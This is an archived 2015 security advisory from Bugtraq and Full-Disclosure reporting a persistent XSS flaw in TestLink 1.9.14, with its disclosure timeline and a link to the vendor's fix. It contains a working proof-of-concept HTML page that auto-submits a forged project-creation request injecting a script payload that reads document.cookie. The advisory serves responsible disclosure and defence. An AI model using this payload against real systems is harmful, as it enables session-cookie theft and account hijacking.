lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALySL4TXD5GkZPLyUN-_D5UD_3Kk9Sj6QC8CdjG4dvDsN-LP+A@mail.gmail.com>
Date: Sun, 8 Nov 2015 19:24:36 +0530
From: Aravind <altoarun@...il.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org
Subject: TestLink 1.9.14 Persistent XSS

Information
=================================
Name: Persistent XSS Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed


Vulnerability Type:
=================================
Persistent XSS


CVE Reference:
=================================
Not assigned


Technical Details:
=================================
Persistent XSS entry point exist in TestLink 1.9.14 allowing arbitrary
client side browser
code execution on victims who visit persistently stored XSS payloads.
The vulnerability has been
discovered in the POST request to create a new Test Project. By
exploiting the vulnerability,
the attacker will get access to the logged in users session cookie. No
Filtering exist on the
vulnerable parameter.


Vulnerable Parameter:
=================================
notes


Exploit Code
=================================

<html lang="en">
<head>
<title>Exploit Persistent XSS TestLink 1.9.14</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/project/projectEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="copy_from_tproject_id" value="0" />
<input type="hidden" name="tprojectName" value="c1" />
<input type="hidden" name="tcasePrefix" value="c2" />
<input type="hidden" name="notes"
value="<script>alert(document.cookie)</script>" />
<input type="hidden" name="optPriority" value="on" />
<input type="hidden" name="optAutomation" value="on" />
<input type="hidden" name="active" value="on" />
<input type="hidden" name="is_public" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="tprojectID" value="0" />
<input type="hidden" name="doActionButton" value="Create" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>


Exploitation Technique:
===================================
Remote


Severity Level:
===================================
High


Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure


Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487

Credits & Authors
====================================
Aravind C Ajayan, Boney S Kalarickal

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ